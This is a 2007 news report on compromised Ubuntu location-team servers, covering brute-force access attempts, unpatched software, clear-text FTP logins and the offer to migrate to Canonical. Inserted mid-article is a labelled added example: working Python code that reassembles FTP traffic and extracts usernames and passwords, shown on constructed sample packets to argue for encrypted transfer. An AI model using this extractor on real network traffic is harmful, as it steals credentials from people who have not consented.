In an IRC (Internet relay chat) meeting of the Ubuntu collocation team this week, one member indicated that the source of the malicious attacks might have been a hacker using a Chinese IP address attempting to access the servers by brute force "for a long time now."
The servers, some of which were hosted by Canonical, the commercial sponsor of the Ubuntu project, were out of date, populated with various web software, and missing security patches, according to Ubuntu project leaders.
"An attacker could have gotten a shell through almost any of these sites" hosted on the downed servers, Ubuntu community manager Jono Bacon wrote in an online posting.
The community began to reboot the servers in a "safe state" this week in an attempt to begin recovering the data stored on them.
"Unfortunately, the process was taking far longer than we would have hoped or liked due to a combination" of issues, Bacon wrote in the posting. These included "having to use remote hands, arbitrary limits imposed by those remote hands and (relative) lack of bandwidth to copy data off site."
"FTP (not sftp, without SSL) was being used to access the machines, so an attacker (in the right place) could also have gotten access by sniffing the clear-text passwords," he added. Also, "The servers have not been upgraded past breezy due to problems with the network card and later kernels. This probably allowed the attacker to gain root."
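The credential-sniffing risk Bacon describes is easy to reproduce. The following is an added example, not code from the original article or from the Ubuntu project: a passive extractor that reassembles the client side of FTP control-channel sessions and pulls out USER/PASS pairs, exactly what an attacker "in the right place" on the network path would do. The Segment structure, IP addresses and captured payloads are constructed for illustration; a real tool would read them from a pcap and handle TCP sequence numbers, whereas here segments are assumed to arrive in order.

```python
"""Extract clear-text FTP logins from captured control-channel segments.

Added example: shows why plain FTP (no TLS) exposes passwords to anyone who
can observe the path. Segments are assumed to be in order; a real capture
would need TCP stream reassembly. Sample traffic below is constructed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

FTP_CONTROL_PORT = 21

# FTP commands are CRLF-terminated lines; USER and PASS carry the credentials.
_USER_RE = re.compile(rb"^USER\s+(\S+)\s*$", re.IGNORECASE)
_PASS_RE = re.compile(rb"^PASS\s+(.*?)\s*$", re.IGNORECASE)


@dataclass(frozen=True)
class Segment:
    """One client->server TCP payload as a sniffer would see it (hypothetical type)."""
    src: str       # client address
    dst: str       # server address
    dport: int     # destination port on the server
    payload: bytes


def reassemble_ftp_flows(segments):
    """Concatenate client->server payloads per (client, server) flow on port 21.

    Traffic to other ports (e.g. an SFTP session on 22) is ignored; its
    payload is encrypted and yields nothing useful to a passive observer.
    """
    flows = defaultdict(bytearray)
    for seg in segments:
        if seg.dport == FTP_CONTROL_PORT:
            flows[(seg.src, seg.dst)].extend(seg.payload)
    return flows


def extract_ftp_credentials(segments):
    """Return one record per USER/PASS pair found in the reassembled flows.

    Reassembling first matters: a PASS line split across two segments (as in
    the sample below) would be missed by a per-packet grep.
    """
    creds = []
    for (client, server), data in reassemble_ftp_flows(segments).items():
        pending_user = None
        for line in data.split(b"\r\n"):
            m = _USER_RE.match(line)
            if m:
                pending_user = m.group(1).decode("ascii", "replace")
                continue
            m = _PASS_RE.match(line)
            if m and pending_user is not None:
                creds.append({
                    "client": client,
                    "server": server,
                    "user": pending_user,
                    "password": m.group(1).decode("ascii", "replace"),
                })
                pending_user = None
    return creds


# Constructed sample capture: two plain-FTP logins (one with the PASS line
# fragmented across segments) and one SSH handshake that reveals nothing.
SAMPLE_SEGMENTS = [
    Segment("10.0.0.5", "192.0.2.10", 21, b"USER loco-admin\r\n"),
    Segment("10.0.0.5", "192.0.2.10", 21, b"PASS hunt"),
    Segment("10.0.0.5", "192.0.2.10", 21, b"er2\r\nSYST\r\n"),
    Segment("10.0.0.7", "192.0.2.10", 22, b"SSH-2.0-OpenSSH_4.3\r\n"),
    Segment("10.0.0.7", "192.0.2.10", 21, b"USER anonymous\r\nPASS guest@\r\n"),
]


if __name__ == "__main__":
    for rec in extract_ftp_credentials(SAMPLE_SEGMENTS):
        print(f"{rec['client']} -> {rec['server']}: {rec['user']} / {rec['password']}")
```

The SSH segment on port 22 contributes nothing, which is the whole argument for SFTP or FTP over TLS: the same observer sees only the protocol banner and ciphertext.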
During the 14 August IRC meeting, the Ubuntu community gave location teams the option of migrating to the Canonical data center or remaining with the hosted/outsourced servers. The UK-based Canonical provides support, professional and engineering services, and hardware and software certification for the Ubuntu variant of the open source Linux operating system.
The benefits of moving to Canonical, noted Bacon, included better hardware and bandwidth and full-time support from Canonical's sysadmin team, including software maintenance and integration into its existing backup infrastructure. The tradeoffs, on the other hand, included no root access, access by per-user SSH key only, a limited number of accounts per location, and software support restricted to a short list that includes the blogging platform WordPress, the Planet feed aggregator used for Planet Ubuntu, and the wiki engine MoinMoin.
Compromised Ubuntu project servers used in attacks taken offline
By Jim Carr on Aug 20, 2007 6:09AM